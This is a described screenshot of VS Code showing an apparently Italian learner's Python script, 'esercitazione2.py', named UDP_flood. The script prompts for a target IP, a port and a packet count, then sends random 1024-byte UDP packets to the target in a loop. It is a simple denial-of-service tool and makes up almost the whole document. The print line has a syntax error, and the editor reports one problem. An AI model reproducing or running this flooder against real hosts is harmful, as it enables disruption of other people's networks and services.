

The screenshot shows the Visual Studio Code (VS Code) interface with a dark theme. The top menu bar includes File, Edit, Selection, View, Go, Run, Terminal, and Help. The title bar displays "python pratic". The left sidebar features the Explorer, Search, and Problems sections, with the Problems section showing one error. The main workspace contains a code editor with the following Python script:

```
episode > esercitazione2.py > ...
1 import socket
2 import random
3
4 def UDP_flood():
5     dati_da_inviare = random._urandom(1024)
6
7     for x in range(numero_pacchetti):
8         s.sendto(dati_da_inviare , target)
9         print('#',x,"-", UDP inviato\n")
10
11 indirizzo_ip = str(input("inserisci l'indirizzo IP target"))
12 porta = int(input("inserisci la porta:"))
13 numero_pacchetti = int(input("inserisci il numero di pacchetti da inviare:"))
14
15 try:
16
17     s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
18     target = (str(indirizzo_ip),int(porta))
19
20 except:
21
22     s.close()
23     print("[!] error!!")
24
25 UDP_flood()
```

In the bottom right corner of the editor, there is a small message box with the text: "Il dispositivo deve essere riavviato per installare gli aggiornamenti. Seleziona un'ora per il riavvio." Below the editor, the status bar shows "Ln 25, Col 12" and other system information.